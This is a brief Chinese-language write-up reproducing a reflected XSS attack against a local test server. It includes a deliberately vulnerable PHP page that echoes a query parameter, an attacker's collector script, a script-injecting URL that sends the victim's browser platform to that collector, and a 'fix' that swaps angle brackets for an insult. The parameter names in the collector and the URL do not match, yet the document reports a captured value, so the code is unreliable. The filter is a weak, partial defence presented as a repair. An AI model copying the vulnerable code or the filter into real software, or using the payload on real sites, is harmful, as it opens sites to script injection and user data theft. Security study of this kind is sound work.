反射型 XSS 复现记录
整个漏洞含有三个实体:
- 攻击者
- 受害者
- 网页服务器:
http://192.168.64.2/index.php
制作漏洞
网页服务器代码:
<?php
echo $_GET['xss'];
?>
利用漏洞
攻击者漏洞利用流程:
- 构造含有 XSS 代码的 URL
- 受害者执行 URL
- XSS 代码在受害者浏览器上执行,获取信息
- XSS 代码将获取的信息发送给攻击者
攻击者接收 XSS 代码传来的信息:http://192.168.64.2/hack.php
<?php
$file = fopen('信息.txt','w');
fwrite($file,$_GET['info']);
?>
攻击者构建的 URL :
http://192.168.64.2/?xss=
<script> window.location.href='http://192.168.64.2/hack.php?hack=' %2B navigator.platform </script>
受害者访问 URL 之后,信息.txt
的内容
MacIntel
修复漏洞
网页服务器代码:
<?php
$safe1 = str_replace('>','臭不要脸,黑老子站',$_GET['xss']);
$safe = str_replace('<','臭不要脸,黑老子站',$safe1);
echo $safe;
?>